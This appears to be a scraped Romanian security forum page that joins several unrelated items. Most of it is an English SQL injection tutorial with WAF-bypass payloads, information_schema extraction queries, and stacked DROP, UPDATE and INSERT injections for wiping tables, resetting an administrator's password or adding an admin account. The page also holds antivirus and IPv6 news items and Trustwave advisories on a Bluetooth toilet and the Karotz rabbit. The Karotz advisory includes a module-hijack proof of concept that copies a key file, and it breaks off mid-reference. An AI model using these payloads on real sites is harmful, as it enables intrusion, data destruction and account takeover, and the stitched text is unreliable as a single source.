Matt

Felicitari, nu-i lasa sa respire.

4. Unele categorii au regulament intern. Verific? dac? exist? un regulament sticky înainte de a posta într-o anumite categorie. În special categoriile "CERERI"(minim 10 posturi de CALITATE), "AJUTOR"(minim 10 posturi de CALITATE) sau "Bloguri ?i Bloggeri"(minim 50 posturi CALITATE).

What is the cause of most problems related to SQL injection? Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should. A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified. If you're interested about WAF's and how they're working then I suggest to read it from wikipedia Application firewall - Wikipedia, the free encyclopedia Order by is being blocked? It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF. If that request will return 'forbidden' then it means it's blocked. http://site.com/gallery?id=1 order by 100-- Then you have to try to use Group by and it will return correct : http://site.com/gallery?id=1 group by 100-- / success Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1) http://example.org/news.php?id=8 and (select * from admins)=(select 1) Then you'll probably recive an error like this : Operand should contain 5 column(s). That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same. http://site.com/news.php?id=-8 union select 1,2,3,4,5-- 'order by 10000' and still not error? That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable? The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working. Example : site.com/news.php?id=9 order by 10000000000-- [No Error] to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter + Example : site.com/news.php?id=9' order by 10000000--+[Error] If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example. http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+ Extracting data from other database. Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also. This will give you Schema names. site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata And with this code you can get the tables from the schema. site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x This code will give you the column names. site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x I get error if I try to extract tables. site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables Le wild Error appears. "you have an error in your sql syntax near '' at line 1" Change the URL for this site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1-- How to bypass WAF/Web application firewall The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time. "404 forbidden you do not have permission to access to this webpage" The code will look like this if you get the error http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5-- [Error] Change the url Like it's below. http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5-- [No error] Is it possible to modify the information in the database by SQL injection? Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one? Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator? You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up. Theory is almost over and now let's get to the practice. Let's say that we're visiting that page and it's vulnerable to SQL injection. http://site.com/news.php?id=1 You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News". With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command. I'd like to get rid of a table, how to do it? http://site.com/news.php?id=1; DROP TABLE news That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials. Let's head to the next statement what's UPDATE. http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'-- Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life : http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'-- We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand. How does INSERT work? Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this : http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')-- INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login. Passwords aren't working Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted. Sometimes i get some weird password This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter, Security, MD5 Hash, MD5 Security. .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result. Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345 You can read about all Hashes what exist and their description hashes - Pastebin.com Md5 hashes can't be decrypted, only cracked How to find admin page of site? Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel. Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's. Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page. Automated SQL injection tools. Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you. Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually. What else can I do with SQL injection besides extracting information? There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count. What to do if all the information doesn't display on the page? I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source. What is the purpose of '--' in the union+select+1,2,3,4,5-- ? I suggest to read about null-byte's and here's a good explanation about it : Null character - Wikipedia, the free encyclopedia because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence. Sursa BreaktheSEcurity.com

Synack, a startup that has built a platform for “crowdsourced security testing”, announced on Thursday that it has closed a $1.5 million seed round of financing. Founded in 2013 by Jay Kaplan and Mark Kuhr, Menlo Park, California-based Synack is looking to disrupt the traditional model of vulnerability assessments and penetration testing. Synack’s platform provides a means for organizations to conduct “Crowdsourced Vulnerability Discovery” using its virtual private testing environment (VPTE), while also giving clients access to a network of security researchers from around the world. Synack “formalizes existing models” for companies that offer bug bounty programs and gives customers a turnkey solution to manage all parts of a vulnerability testing and rewards program. Synack’s platform allows organizations to launch a full vulnerability assessment in just a few hours, the company explained, giving enterprises the ability to collect quick feedback, and decrease time to market and patch critical vulnerabilities. In a recent analysis of bug bounty programs, academic researchers from the University of California, Berkeley concluded that the programs were cheaper to run than hiring expert security researchers to find software vulnerabilities. “Synack's founders have leveraged their experience at the National Security Agency to deliver a solution that finds and vets the very best computer scientist researchers around the world and applies their unique skills to vulnerability testing with hundreds of different research perspectives applied to target technologies,” the company said in an announcement. The funding came from Kleiner Perkins Caufield & Byers (KPCB), Greylock Partners, Wing Venture Partners, Allegis Capital, and Derek Smith, CEO of Shape Security, another security firm backed by KPCB. "Synack is developing stealth technologies that will form a new standard for vulnerability discovery. Companies like Google and Facebook have demonstrated that using global white hat researchers is an outstanding way to identify security problems and Synack can deliver this capability to any commercial company without compromising security, privacy, and confidentiality," said Ted Schlein, general partner, KPCB. "We were looking for technology which would go beyond any one company's testing methodology," said Derek Smith, CEO of Shape Security. "Synack gives us a holistic end-to-end view of our security posture, derived from hundreds of different researchers with different backgrounds." More information is available on Synack’s website. Sursa SecurityWeek.com

Solutia de securitate Kaspersky Internet Security 2013 pentru utilizatori individuali s-a clasat pe primul loc in clasamentul Home Anti-Virus Protection April – June 2013, realizat de organizatia independenta de experti Dennis Technology Labs. Solutia Kaspersky Lab a demonstrat un grad de eficienta de 97%, obtinând 388 de puncte din totalul posibil de 400, depasindu-si toti rivalii in cadrul testelor. In urma rezultatelor cercetarii, solutia Kaspersky Internet Security 2013 a primit calificativul de top AAA – cel mai inalt grad oferit de Dennis Technology Labs. Eficienta solutiilor in cadrul testelor a fost determinata de abilitatea de reactie in timp real la amenintari si de capacitatea de a gasi si de a bloca amenintarile in timpul procesului de scanare antivirus. De asemenea, a fost luat in considerare si numarul de rezultate fals pozitive. Conform testelor, solutia Kaspersky Internet Security 2013 a ratat o singura amenintare (pe când celelalte au ratat in medie 5,7) si a returnat un singur rezultat fals pozitiv (media a fost de 3,5). Toate solutiile de securitate testate au gestionat un set de 100 de amenintari. Dennis Technology Labs a ales pentru cercetare cele mai periculoase mostre de malware care erau active „in the wild” la momentul realizarii testelor. „Premiul oferit de Dennis Technology Labs este o recunoastere a calitatii functionalitatii solutiei noastre – abilitatea de a face fata câtorva mii de amenintari cunoscute, dar si necunoscute”, a declarat Nikita Shvetsov, Deputy CTO (Research) in cadrul Kaspersky Lab. „Testele dovedesc faptul ca produsul nostru functioneaza eficient in conditii obisnuite din viata reala si acest lucru este un motiv de mândrie pentru noi”, a adaugat Shvetsov. Aceasta este a doua oara consecutiv când solutia Kaspersky Internet Security 2013 s-a pozitionat in fruntea clasamentului in cadrul testelor organizate de Dennis Technology Labs. In luna mai 2013, Dennis Technology Labs a decis ca solutia Kaspersky Lab este cea mai buna, in urma unor teste similare derulate in primul trimestru al anului. Mai multe detalii despre testele organizate de Dennis Technology Labs pentru solutiile de protectie pentru utilizatori individuali gasiti pe website-ul organizatiei. Sursa FaraVirusi.Com

Kaspersky Lab anunta lansarea versiunii finale pentru noua generatie de produse de securitate Kaspersky Antivirus si Internet Security 2014. Iata ce noutati si imbunatatiri : aduce: To increase security of applications, Trusted Applications mode has been added. When Trusted Applications mode is enabled, Kaspersky Internet Security allows starting only known and trusted applications and ensures that they are run safely. Trusted Applications mode will be available in September 2013, after an update to Kaspersky Internet Security. Protection against screen lockers has been added. You can unlock the screen by using a specified key shortcut. Protection against screen lockers detects and eliminates the threat. Screen lockers can now be automatically monitored and rolled back. On Windows 8, Kaspersky Internet Security can minimize activity when switched to Connected Standby mode. When running in limited activity mode, Kaspersky Internet Security pauses scan tasks and update tasks. When the computer returns from Connected Standby mode, all paused tasks are resumed automatically. The latest versions of popular web browsers are now supported: protection components (such as Kaspersky URL Advisor or Safe Money) support Mozilla Firefox 16.x, 17.x, 18.x, 19.x, 20.x, 21.x. and 22.x; Internet Explorer 8, 9, and 10; and Google Chrome 22.x, 23.x, 24.x, 25.x, 26.x, and 27.x. The option of participating in the Protect a Friend program has been added. You can now share a link to Kaspersky Internet Security with friends and receive bonus activation codes. What’s improved : The functionality of Safe Money has been improved. You can now select a web browser to open websites of banks or payment systems. A list of popular websites for financial operations has been added; when these websites are accessed, Safe Money is enabled automatically. The functionality of Parental Control has been improved: permissions to start games and applications can be flexibly configured. Age-appropriate presets have been added to Parental Control for restricting user activity. Configuration of Kaspersky Internet Security has been simplified. Now only frequently used application settings are available for configuration. Phishing protection is now more powerful: the Anti-Phishing component has been improved and updated. Protection components now use Kaspersky ZetaShield technology, which offers effective detection of exploits. Faster application performance and reduced computer resource use. Less time is required to start the application. GUI performance and responsiveness to user actions have been improved. Application reporting has been improved. Reports are now more intuitive and visual. Pentru a descarca Kaspersky Internet Security 2014 accesati: Kaspersky Internet Security Free Download - Trojan Remover Pentru a descarca Kaspersky Antivirus 2014 accesati: Kaspersky Anti-Virus Free Download - Scan For Viruses

Bitdefender, liderul pietei romanesti de solutii antivirus, a obtinut cel mai mare punctaj in cele mai recente sesiuni de evaluare derulate de organizatiile internationale de testare AV-Test si AV-Comparatives. Astfel, institutul german independent de testare AV-TEST a clasat Bitdefender Internet Security 2013 pe prima pozitie in topul celor mai performante soft-uri de securitate pentru PC, in runda desfasurata in perioada mai-iunie, cu 17,5 puncte obtinute din maximum de 18 posibile. Urmatorul clasat a cumulat 16,5 puncte, iar in sesiunea de testare au fost incluse 26 de solutii antivirus. De asemenea, potrivit testului realizat de institutul austriac de evaluare AV-Comparatives in perioada martie-iunie, Bitdefender Internet Security 2013 a obtinut o rata de protectie de 99,9%, cel mai bun punctaj din aceasta runda. In cele patru luni de evaluare au fost testate 19 produse, in conditii asemanatoare celor din realitate si s-au folosit 1972 de cazuri de testare. ’’Cele mai recente rapoarte de securitate arata ca amenintarile informatice cresc in complexitate, devin din ce in ce mai ingenioase si se schimba constant in incercarea de a escroca cat mai multi utilizatori de dispozitive electronice. In acest context, o solutie de securitate informatica performanta este esentiala pentru siguranta conturilor bancare sau a datelor personale ale utilizatorilor. Iar rezultatele publicate in ultima saptamana de AV-TEST si AV-Comparatives reconfirma performantele Bitdefender si recunosc efortul constant al unei echipe cu experienta extinsa in industria de securitate globala’’, a declarat Catalin Cosoi, Chief Security Strategist, Bitdefender. Bitdefender s-a clasat constant pe primul loc in evaluarile independente realizate la nivel international in ultimii trei ani, iar la inceputul acestui an a primit distinctia Produsul Anului acordata de AV-Comparatives. De asemenea, la scurt timp dupa lansarea noului Bitdefender, la inceputul lunii iulie, produsele Bitdefender Antivirus Plus si Bitdefender Total Security au primit distinctia Editor’s Choice acordata de prestigioasa publicatie americana de profil PCMag. Mai multe detalii : AV-TEST: AV-TEST - The Independent IT-Security Institute: May/Jun 2013 AV-Comparatives: http://www.av-comparatives.org/wp-content/uploads/2013/07/avc_prot_2013a_en.pdf PCMag: Bitdefender Antivirus Plus (2014) Review & Rating | PCMag.com Bitdefender Total Security (2014) Review & Rating | PCMag.com

Avira a lansat, dupa o perioade destul de lunga, o noua versiune a programului Avira Rescue System. La ce foloseste acesta? Ei bine, la fel ca si celelalte produse similare de la alti producatori de securitate, este util in cazul unei infectii grave a sistemului, cand Windows-ul nu mai porneste sau cand o scanare normala nu are eficienta. Programul ruleaza de pe un disc bootabil si poate scana, dezinfecta sau recupera datele inainte de a porni Windows-ul. Noua versiune de la Avira aduce cateva functii noi si deosebit de importante. In primul rand este bazata pe Ubuntu, probabil cea mai buna distributie de Linux, are o interfata grafica noua. In al doilea rand, dezinfectia a devenit mult mai eficienta, produsul putand repara efectele virusilor, in mod particular modificarile aduse registry-ului. Programul are de acum si un editor registry, browser web Firefox, conectare prin TeamViewer. Pentru o prezentare mai ampla, urmariti clipul video de mai jos : Pentru a testa noul Avira Rescue System, accesati site-ul: Download Avira Rescue System | Official Website

Uptake of Windows 8 for desktop computers – which was never particularly fast – has slowed, according to stats for July from web traffic pollsters Net Applications. Microsoft's latest operating system held a 5.4 per cent of the global desktop OS market last month, up 0.3 points on June which was up 0.83 points on May. A glance at the Net Applications graph shows a gradually slowing trend over time. (We're told the stats were gathered from the logs of some 160m unique web surfers hitting 40,000 websites in the pollster's analytics network: each visitor's browser is expected to reveal some basic information about their computer, but this can be spoofed so the usual health warnings about user-agent statistics apply.) Officially released in October 2012, Windows 8 has been growing at less than one per cent a month in the desktop arena, but June was the high water market hitting nearly a whole one percentage point of growth. Last month, though, its rate of increase slumped. That's sobering news for Microsoft. But a disturbing fact for everybody else is that Windows XP - enjoying second place in the stats - had a minor resurgence during July. Net Applications found XP, first released in 2001, clawed back 37.19 of the market versus 37.17 in the month before, pausing its long-term downward trend towards its demise. Many companies moving off Windows XP are going to Windows 7, the number one most used desktop OS, and Net Applications found version 7’s use up by 0.12 points on June. These numbers are incremental changes, but momentum begins with a small shove. Is an overbearing attachment to Windows XP to blame for the revival or the fact techies are hitting the beaches for the summer break, so temporarily AWOL on the upgrade front? While the Windows 8 usage numbers are more salt in wounds for Microsoft, it’s the minor consolidation in Windows XP that should worry everybody else. As web browser migration specialist Browsium noted in its blog here, even before Windows XP’s July bump its use has been falling rather too slowly for the industry to realistically hit the goal of zero Windows XP by April 2014. That's the date when Microsoft officially turns off extended support for the operating system, so there will be no more security updates. Customers will be on their own. Browsium states: “There’s clearly a lot of work ahead for enterprise IT. In fact, XP share has only come down 2.3 per cent since January, for an average of 0.3 per cent/month. That certainly does not inspire confidence in achieving the goal.” ® Sursa TheRegister.co.uk

A gap in the adoption of the IPv6 protocol could be leaving users prone to attack, say researchers. Security firm NeoHapsis is warning that the protocol, which has been undergoing a rollout over the last several years, could be subject to a unique attack that redirects users to unwanted potentially malicious pages. Dubbed a “SLAAC” attack, the operation takes advantage of the client-side rollout of IPv6 and the built-in preference such systems have for the new protocol. “Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4,” explained Neohapsis researchers rent Bandelgar and Scott Behrens. “This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.” The researchers went on to describe an attack in which the attacker finds and IPv4 and sets up a server or network impersonating an IPv6 alternative. When users attempt to load the intended site, their systems could, by default, select the imposter network instead, sending their traffic through the attacker's systems. “They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine,” the researchers said. “Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).” While such attacks could be mitigated by disabling IPv6 on newer systems, Neohapsis believes that the more practical and effective solution for the long term is to encourage companies and network operators to speed up their adoption of the IPv6 protocol. Sursa V3.co.uk

Description : LIXIL Satis Toilet suffers from having a hard-coded bluetooth PIN of 0000. Attackers can cause your toilet to repeatedly flush. Yes, this is a real advisory. Author : Dan Crowley Source : LIXIL Satis Toilet Hard-Coded Bluetooth PIN ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-020: Hard-Coded Bluetooth PIN Vulnerability in LIXIL Satis Toilet Published: 08/01/13 Version: 1.0 Vendor: LIXIL Corporation Product: Satis Version affected: Unknown Product description: The Satis is a "smart" toilet. It is controlled using LIXIL's "My Satis" Android application, which communicates with the toilet using Bluetooth. Finding 1: Hard-Coded Bluetooth PIN *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4866 CWE: CWE-259 The "My Satis" Android application has a hard-coded Bluetooth PIN of "0000" as can be seen in the following line of decompiled code from the application: BluetoothDevice localBluetoothDevice = BluetoothManager.getInstance().execPairing(paramString, "0000") As such, any person using the "My Satis" application can control any Satis toilet. An attacker could simply download the "My Satis" application and use it to cause the toilet to repeatedly flush, raising the water usage and therefore utility cost to its owner. Attackers could cause the unit to unexpectedly open/close the lid, activate bidet or air-dry functions, causing discomfort or distress to user. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. Revision History: 06/14/13 - Attempt to contact vendor 07/10/13 - Attempt to contact vendor 07/12/13 - Attempt to contact vendor 08/01/13 - Advisory published References 1. http://www.lixil.co.jp/lineup/toiletroom/shower/satis/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : Karotz Smart Rabbit version 12.07.19.00 suffers from python module hijacking and cleartext token passing vulnerabilities. Author : Dan Crowley Source : Karotz Smart Rabbit 12.07.19.00 Hijacking / Cleartext Token ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-021: Multiple Vulnerabilities in Karotz Smart Rabbit Published: 08/01/13 Version: 1.0 Vendor: Electronic Arts (http://www.ea.com/), formerly Mindscape, formerly Violet Product: Karotz Version affected: 12.07.19.00 Product description: Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled ambient electronic device in the shape of a rabbit, invented by Rafi Haladjian and Olivier Mével, and manufactured by the company Violet.[1] Nabaztag was designed to be a "smart object" comparable to those manufactured by Ambient Devices; it can connect to the Internet (to download weather forecasts, read its owner's email, etc.). It is also customizable and programmable to an extent. Finding 1: Python Module Hijacking *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4867 CWE: CWE-427 During the setup process for a Karotz unit, if wifi is selected as the method used to connect to the Internet, a python script named "autorunwifi" is run as root to set up the wifi connectivity. This file, along with several others, is placed in the root of a USB flash drive or hard drive. Another file, named "autorunwifi.sig", contains a signature of autorunwifi signed with the private key for Violet, to prevent modifications to the "autorunwifi" script. Since Python first attempts to load modules not built into Python from the same directory as the invoked script, it is possible to override the functionality of imported modules by placing a file with the same basename as the module being imported and an extension of ".py". In this case, it is possible to write a Python script named "simplejson.py" and place it in the same directory as the other setup files, which will cause the contents of simplejson.py to be executed at the beginning of the "autorunwifi" script execution. This attack requires a USB flash drive to be plugged into the Karotz unit, and requires the Karotz to be turned off and on. The following is a proof of concept "simplejson.py" file that will copy the pubring.gpg file from the Karotz onto the inserted USB key, which is processed with MD5 to produce the key used to decrypt the root filesystem for the Karotz: ## simplejson.py import os os.system("cp /karotz/etc/gpg/pubring.gpg /mnt/usbkey") ## end simplejson.py Finding 2: API Session Token Passed in Cleartext *****Credit: Daniel Crowley of Trustwave SpiderLabs CVE: CVE-2013-4868 There are two kinds of applications for the Karotz: hosted and external. Hosted applications are stored and run on the Karotz itself. External applications run outside the Karotz unit and control the Karotz through an api at api.karotz.com. Both types of applications must specifically request to use parts of the karotz in the manifest file of their application package. For instance, if your application uses the webcam and ears, you must specify in your application manifest that these will be used by your application before they will be available to your application. The control is performed over plaintext HTTP. As such, the session token authenticating API calls used to control the Karotz is available to an eavesdropping attacker. The session token can be used to perform any remote API call available to the application. For instance, if the application uses the webcam, a video could be captured using the webcam and sent to an arbitrary server. Vendor Response: No response received. Remediation Steps: No official patch is available. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Revision History: 06/19/13 - Attempt to contact vendor 07/10/13 - Attempt to contact vendor 07/12/13 - Attempt to contact vendor 08/01/13 - Advisory published Additional Credits: Discussion of Python module loading behavior and initial suggestion of application to Karotz by Jennifer Savage References 1. http://www.karotz.com 2. 